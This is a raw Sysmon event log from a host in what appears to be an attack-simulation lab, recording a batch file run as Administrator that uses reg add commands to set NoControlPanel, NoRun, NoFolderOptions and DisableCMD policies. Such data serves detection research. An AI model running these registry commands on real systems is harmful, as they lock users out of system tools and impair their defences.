12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.599{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.609{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.599{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000001) 10341000x80000000000000009447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.599{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.596{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.583{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000001) 10341000x80000000000000009438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.583{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.586{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.567{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRunDWORD (0x00000001) 10341000x80000000000000009429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.567{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.567{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.573{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.536{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMDDWORD (0x00000001) 10341000x80000000000000009420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.520{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 